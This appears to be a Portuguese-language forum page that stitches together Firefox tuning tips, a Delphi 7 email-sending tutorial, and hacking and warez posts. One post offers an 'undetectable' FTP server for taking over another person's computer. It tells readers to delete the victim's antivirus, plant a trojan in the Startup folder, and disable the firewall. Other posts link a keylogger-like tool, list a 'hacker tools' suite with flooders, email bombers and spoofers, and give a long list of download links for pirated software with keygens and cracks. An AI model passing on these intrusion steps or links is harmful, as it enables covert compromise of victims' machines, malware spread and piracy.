1- No campo de endereços digite "about:config" sem aspas.

2- Pesquise sobre os seguintes nomes e mude seu valor pelo apresentado ao lado.

Citação:

browser.cache.disk.capacity: 10240
network.http.max-connections: 48
network.http.max-connections-per-server: 24
network.http.max-persistent-connections-per-proxy: 12
network.http.max-persistent-connections-per-server: 6
network.http.pipelining: true
network.http.pipelining.maxrequests: 32
network.http.proxy.pipelining: true


3- Clique com o botão direito em qualquer linha e escolha "Nova Opção > Inteira".

Citação:
Nome: browser.cache.memory.capacity
Valor: 16000


Obs: É viavel primeiro fazer um backup do Fifefox caso houver alguma “atrapalhação". Para isso deve-se fazer uma cópia da pasta C:\Documents and Settings\Nome_do_Admin\Dados de aplicativos\Mozilla\Firefox antes de fazer qualquer alteração.

Enviando e-mail no Delphi 7

Essa é uma aplicação bem simples para envio de e-mail onde iremos utilizar componentes Indy.

Crie um novo projeto. Salve a unit com o nome untEmail e o projeto com o nome Email.
Altere a propriedade Position do formulário (Form1) para poScreenCenter e adicione os seguintes componentes:

4 Labels:
- Altere as propriedades Caption para: Para, Assunto, Mensagem e Anexos

2 Edits:
- Altere as propriedades Name para: edtPara e edtAssunto
- Apague o conteúdo da propriedade Text

1 Memo:
- Altere a propriedade Name para: memMensagem
- Limpe a linha da propriedade Lines

1 ListBox
- Altere a propriedade Name para: lbxAnexo

3 Button
- Altere as propriedades Caption para: Anexar, Enviar e Fechar
- Altere as propriedades Name para: btAnexar, btEnviar e btFechar

1 OpenDialog (palheta: Dialogs)
- Altere a propriedade Name para: odAnexar

1 IdMessage (palheta: Indy Misc)
- Altere a propriedade Name para: idMensagem
- Informe o e-mail do remetente na propriedade From|Address
- Informe o nome do remetente na propriedade From|Name

1 IdSMTP (palheta: IndyClients)
- Altere a propriedade name para: idSMTP
- Informe o DNS ou IP do servidor de e-mail na propriedade Host (exemplo: smtp.ig.com.br)
- Informe, se necessário, a senha e usuário nas propriedades Password e Username, respectivamente, para fazer a autenticação no servidor

Faça a seguinte codificação dos respectivos componentes:

- No evento OnClick do botão btAnexar:

procedure TForm1.btAnexarClick(Sender: Tobject);
begin
if odAnexar.Execute then
lbxAnexos.Items.Add(odAnexar.FileName);
end;


- No evento OnClick do botão btFechar:

procedure TForm1.btFecharClick(Sender: Tobject);
begin
Application.Terminate;
end;


- No evento onclick do botão btEnviar:

procedure TForm1.btEnviarClick(Sender: TObject);
var
i: Integer;
begin
idMensagem.Recipients.EMailAddresses := edtPara.Text;
idMensagem.Subject := edtAssunto.Text;
idMensagem.Body := memMensagem.Lines;

//Manipulando os Anexos
for i:= 0 to (lbxAnexos.Items.Count - 1) do
TIdAttachment.Create(idMensagem.MessageParts, TFileName(lbxAnexos.Items.Strings[i])); IdSMTP.Connect;
try
IdSMTP.Send(idMensagem);
finally
IdSMTP.Disconnect;
end;
ShowMessage('E-mail enviado com sucesso.');
end;


Pronto! Agora é com você!
Seu programa de enviar e-mail já está pronto. Não esqueça de sempre ir salvando durante o desenvolvimento, para não perder nada do que foi feito. Dica: pressione CTRL-S para salvar.

Razz


Facin...

abraçoss Laughing

essoal não sei se já existe isso que eu vou mostrar aqui, mas eu não vi neste forum.

É o seguinte; eu fiz um servidor FTP (delphi), sendo assim ele não é detectado pelos antivirus + comum, pois é um simples servidor FTP , vc envia ele para a "pessoa" e ele vai habilitar a porta "4132" dando acesso ao computador da "pessoa" o FTP é muito usado para tranferência de arquivos, sendo assim primeiro vc deleta o antivirus da pessoa, e depois envia um trojan em na pasta;



Código:
C:\Documents and Settings\All Users\Menu Iniciar


quando o computador iniciar o trojan será executado.

download do FTP 4132 em:

http://rapidshare.com/files/73911563/FTP4132_-_SENHA__4132_.zip

OBS: Fiz uma modificação a respeito do anterior... este desabilita o Firewall do windows... tem umas explicações sobre o programa em um txt e um jpg..

POSTEM O RESULTADO... Se vcs conseguiram usar.. e talz.. Se der certo vou aprimorar ainda +..


Objetivo do programa; É claro que todo mundo vai baixar e usar para invadir computadores, ainda + que o AV não tá pegando e talz.. mas eu desenvolvi este programa para fazer tranferência em uma rede no meu local de trabalho pois transferimos muitos arquivos, o bom é que não precisa de permissão nenhuma agora, é só instalar o servidor e pronto, o computador é seu.

Aguardo os post de vcs... e o apoio para que eu aperfeiçoe o meu programa.

Para Criar Sever Funciona Tipo Igual Um Keylloager
mas esse esta indetctavel e mto eficiente

Intereçou Quer Baixar Link esta aki em baixo
http://rapidshare.com/files/76847286/IDownloader_v2.0.rar

eh pra abusar memu =Drsrsrs

Mais Uma

Hackers tools suite

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner April 2005
6) Ping
7) NetStat 2005
Cool Cool Trace Route 2005
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and prtotector
16) Net Sender April 2005
17) E-mail seeker
1Cool Cool Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter Multi IP April 2005
26) Port Connecter Tool
27) Advanced Spoofer
2Cool Cool Advanced Anonymous E-mailer April 2005
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
3Cool Cool Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
4Cool Cool Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
5Cool Cool Variable Encryption
59) Simple File Encryption
60) ASCII to Binary
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
6Cool Cool Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
7Cool Cool API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
and more..


http://rapidshare.de/files/21906099/HTF__projectallabout.org_.rar.html

Centenas Progamas Haker Pacotão 2008

Centenas e mais centenas de Software AKI !!!

3dmark05 v1.2.0 Pro:
http://downloads.planetmirror.com/pub/majorgeeks/benchmark/3DMark05_v120_installer.exe
Keygen:
http://www.users.qwest.net/~huukis/apps/Futuremark.3DMark05.Pro.v1.0.Keygen.Only-ORiON.rar
http://download.9down.com/KEYGEN/Futuremark.3DMark05.Pro.v1.0.Keygen.Only-ORiON.rar

3D Home Deluxe 2005 v8.0:
CD1:
http://down.fangdown.com/down.asp?id=4420&no=1
CD2:
http://down.fangdown.com/down.asp?id=4420&no=2

3D Home Architect
Landscape Design Deluxe 6.0:
http://gupin.fangdown.com/down.asp?id=3094&no=1
password: http://www.gupin.com

3D Studio Max v7.0:
ftp://ftp.discreet.com/pub2/web/products/3dsmax/v7trial/3dsmax7new.exe
Keygen:
http://ftp4.ttdown.com:80/2004/10A/Discreet%203DS%20MAX%20v7.0%20Final.KG.rar
SP1:
ftp://ftp1.discreet.com/web/support/3dstudio/Setup_3dsmax7_SP1.exe

321 Studios DVD X Copy Platinum v4.0.3.8:
http://www.nycsoftware.com/Download/X%20Copy%20Platinum/DVDXCopy_Platinum_v4.0.3.8_full_install.exe
Fix:
http://rapidshare.de/files-en/537880/DVDXCopy4.0.3.8_Cracked.rar.html

321 Studios DVD X Copy XPRESS v3.2.1:
http://www.nycsoftware.com/download/DVD-XPRESS/DVDXCopy_XPRESS_v3.2.1_full_install.exe
Keygen:
http://www.xaliasx.uxbridge20.com/DVDXCopyXPRESS3.2.1kg.rar
http://www18.fixdown.com/keydown2003/ag-dxxxpa-2003-11-08.rar

Remove .VOB ID:
http://www.dvdrhelp.com/forum/userguides/127933.php

321 Studios DVD X Maker v2.0.1:
ftp://products.321studios.com/6160/DVDXMaker2_0_1.exe
Keygen:
http://www.xaliasx.uxbridge20.com/DVDXMaker2.0kg.rar
http://www18.fixdown.com/keydown2003/ag-dxm2c-2003-11-08.rar

321 Studios DVD X Point v2.1.0:
http://www.nycsoftware.com/download/DVD-X-POINT/DVDXPOINT.exe
Keygen:
http://www.xaliasx.uxbridge20.com/DVDXPoint2.0kg.rar

321 Studios DVD X Rescue v2.1.2.16:
http://www.nycsoftware.com/download/DVD%20X%20Rescue/DVDXRescue_2.1.2.16_full_install.exe
Fix:
http://xaliasx.atspace.com/fix/dvdxrescuecrk.zip

321 Studios DVD X Show v2.2:
ftp://products.321studios.com/6232/DVDXShow_v2.2_full_install.exe
Keygen:
http://www.xaliasx.uxbridge20.com/DVDXShow2.0kg.rar
http://www18.fixdown.com/keydown2003/eatdxc2d-2003-12-23.rar

321 Studios Games X Copy v1.0.8:
http://www.nycsoftware.com/download/Games%20X%20Copy/GamesXCopy_v1.0.8_full_install.exe Fix:
http://xaliasx.atspace.com/fix/gamexcopycrk.zip

ABBYY FineReader Pro v7.0.0.963:
http://fr7.abbyy.com/fr70pro/FR70pro_eng.exe
Keygen:
http://dl.sn2sn.com/07_Apps/ABBYY.FineReader.Professional.v7.0_keygen.rar
http://softex.meganet.lt/FIX/01.27/ABBYY.FineReaderPro-Keygen.rar
http://www18.fixdown.com/keydown2003/cr-frpzq-2004-07-05.rar

ABBYY Scan To Office v1.0:
http://fr7.abbyy.com/scanto/Scanto01TB.exe
Keygen:
http://www.konfa.ru/public/dload/filex/scan_to_office_v1.0keygen.rar

AC3D v5.0:
http://www.ac3d.org/ac3d/download/ac3dwin.exe
Keygen:
http://www18.fixdown.com/keydown2003/lcdac3dy-2005-04-29.rar

ACDSee v7.0.102 PowerPack:
http://files.acdsystems.com/english/downloads/acdsite/acdseepowerpack.exe Keygen:
http://softex.meganet.lt/FIX/02.03/ACDSee7.0.Cr.rar
http://download.9down.com/KEYGEN/ACD.Systems.AcdSee.v7.0.43.PowerPack.Keymaker.Only.Fixed-CORE.rar

ACDSee v6.0.6 PowerPack:
http://download.9down.com/software/ACD.Systems.ACDSee.v6.0.6.PowerPack-ROR.rar
http://www8.piaodown.com/721down/ACDSee.v6.0.6.piaodown.com.rar
Plug-ins:

ACD 2DVector Pak v1.0:
http://files.acdsystems.com/english/plug-ins/2d-vector-pak.exe
Fix:
http://www18.fixdown.com/keydown2003/ror2vp10-2003-6-21.rar

ACD FotoSlate v3.0:
http://www18.fixdown.com/keydown2003/rorafs3b-2003-7-22.rar

ACD Photostitcher v1.0.6:
http://www18.fixdown.com/keydown2003/rorapp10-2003-6-21.rar

ACD mPower Tools v1.02:
http://files.acdsystems.com/english/downloads/acdmpowertools/acdmpowertools.exe
http://www18.fixdown.com/keydown2003/roramt1a-2003-6-21.rar

Keygen:
http://home.wanadoo.nl/bidjan/pub/acdmpower1_patch.zip

ACD VideoMagic v1.0 SR-2:
http://download.divx.com/partners/acd/ACDVideoMagic_DivXPro_Trial_A.exe
http://www18.fixdown.com/keydown2003/n-vme121-2003-4-21.rar

Keygen:
http://home.wanadoo.nl/bidjan/pub/acdvideomagic_patch.zip
http://www18.fixdown.com/keydown2003/roravm10-2003-4-21.rar

LuraDoc v1.0:
http://www18.fixdown.com/keydown2003/luradocument.rar

RealView3DPro:
http://files.acdsystems.com/english/downloads/realview3dpro/realview3dpro.exe
Fix:
http://wmw.crackz.ws/jahgdjkasj/r/rorr3p26.zip

Acoustica CD Label Maker v2.34:
http://www.getafile.com/cgi-bin/merlot/get/josephc/cd-label-maker/Acoustica-CD-Label-Maker-Installer.exe
Keygen:
http://pcsoft.srv.hu/daten/lm2342.zip
http://www18.fixdown.com/Keydown2003/e-acdlm2-2005-02-19.rar

Acoustica MP3 CD Burner v4.01.112:
http://dl.filekicker.com/send/file/144256-JVEH/Acoustica-MP3-CD-Burner-Installer.exe
Keygen:
http://www21.fixdown.com/endown/tbeacd48-2005-04-05.rar

Acoustica MP3 To Wave Converter PLUS v2.341:
http://www.getafile.com/cgi-bin/merlot/get/josephc/mp3-wav-convert/Acoustica-MP3-To-Wave-Converter-PLUS-Installer.exe
Keygen:
http://www.revengecrew.org/04-rlz/acoustica.mp3.to.wave.converter.plus.2.341.keygen-rev.rar

Acronis Power Utilities 2005 build 613:
http://www.acronis.com/files/powerutilities2005_s_en.exe
Keygen:
http://softex.meganet.lt/FIX/2005/AcronisPowerUtilities2005-Keygen.rar

Acronis True Image v8.0.826:
http://download.acronis.com/trueimage8.0_s_en.exe

Acronis True Image v8.0.826 Server:
http://download.acronis.com/trueimageserver8.0_s_en.exe
Keygen:
http://www.uploadtemple.com/view.php/1113416286.zip

Acronis True Image v8.0.1124 Corporate Workstation:
http://www.acronis.com/files/TrueImageCorporateWorkstation8.0_s_en.exe

Acronis True Image v8.0.1124 Enterprise Server:
http://www.acronis.com/files/TrueImageEnterpriseServer8.0_s_en.exe
Keygen corp/ent:
http://softex.meganet.lt/FIX/03.16/AcronisTrueImage8.0.CW.ES.KEYGENS.rar
http://rapidshare.de/files-en/478598/AcronisTrueImage8.0.CW.ES.KEYGENS.rar.html
http://sr1.mytempdir.com/7149


Ad-aware Reference file SE1R26 25.01.2005:
http://download.lavasoft.de.edgesuite.net/public/defs.zip

Ad Muncher v4.51a:
http://www.admuncher.com/AM-Install.exe
Fix:
http://www.ptt.yu/korisnici/v/e/veselinski/am_451a_patch.zip
http://portalwarez.com/flz.cracks4u.us/qwerty/A/admuncherv4.51a8416keygenembrace.zip

Adobe Acrobat v7.0 Pro:
http://cert.ynnubs.com/soft/Adobe%20Acrobat%207.0%20Professional.rar
http://gradict.kahosl.be/omar.reygaert/download/Adobe%20Acrobat%207.0%20Professional.exe v7.0.1 Update:
http://ardownload.adobe.com/pub/adobe/acrobat/win/7x/7.0.1/misc/Acro-Reader_701_Update.exe

Adobe AfterEffects v6.5 Pro:
http://gupin.fangdown.com/down.asp?id=2777&no=1

Adobe Audition v1.5:
http://zorro.tuoitre-online.net/software/AdobeAudition.zip
http://homepages.nildram.co.uk/~pipers/3j5WwzGp914mC/31df41878a4a1ec51503713d21dbf370/Adobe.Audition.v1.5.Incl.Keymaker-AGAiN.rarAdobe

Creative Suite:
CD1:
http://www.fbstu.com/download.asp?id=622&site=2
CD2:
http://www.fbstu.com/download.asp?id=623&site=2
Keygen:
http://xaliasx.atspace.com/fix/midapskg.zip

Adobe Dimensions v3.01:
http://61.159.224.200/flash/flashsoft/Dimensions3.zip
http://www.f7-d.com/soft/Adobe_Dmnsions_v3.01_Full.zip

Adobe GoLive CS:
http://download.adobe.com/pub/adobe/magic/golive/win/7.x/Adobe_GoLive_CS_Tryout.zip

Adobe GoLive v6.0:
http://download.adobe.com/pub/adobe/magic/golive/win/6.x/AdobeGoLive6try.zip

Fix:
http://flz.thebugs.ws/zzcca/A/adobegoliveversion6.0%20englishpatchbidjan.zip
v6.01 Update:
http://download.adobe.com/pub/adobe/golive/win/6.x/GL6.0.1_Win_Client_Updater.zip

Adobe Illustrator CS:
http://freezip.ru/e107_files/downloads/ADOBE%20IllustratorCS%2011.0.zip
http://foto.ahost4free.com/adobe/Adobe%20Illustrator%20CS%20+%20serial.zip

Adobe Illustrator v10.0:
http://download.adobe.com/pub/adobe/magic/illustrator/win/AI10try.exe
Fix:
http://cracks4u.us/zipfiles/A/AdobeIllustrator10TryouttoFullpatchBidjan.zip
v10.0.3 Update:
ftp://ftp.adobe.com/pub/adobe/illustrator/win/10.x/ai10_0_3en.exe

Adobe InCopy v2.0:
http://nehl.free.fr/Adobe.InCopy.v2.0.Incl.Keygen-SSG.zip

Adobe InDesign CS:
http://foto.ahost4free.com/adobe/Adobe.InDesign.CS[standalone.pc](serail.inc)-DeZiGnTHIS.rar

Adobe Pagemaker v7.0.1:
http://download.adobe.com/pub/adobe/magic/pagemaker/win/7.x/PM701Tryout.exe
Fix:
http://softex.meganet.lt/FIX/01.11/AdobePageMaker7.0.1Tryout.rar

Adobe Photoshop CS2 v9.0:
http://ftp.adobe.com/pub/adobe/photoshop/win/cs2/Photoshop_CS2_tryout.zip
Keygen:
http://www.xstream-eliteplayers.com/secrets/keygen.zip
http://www.hot.ee/fastandfurious666/dl/Photoshop.CS2.KeyGen.zip

Adobe Photoshop Album v2.0:
http://www18.fixdown.com/keydown2003/ag-apa2a-2003-10-18.rar
v2.01 Update:
http://download.adobe.com/pub/adobe/photoshopalbum/win/2.x/photoshop_album_2_0_1_updater.zip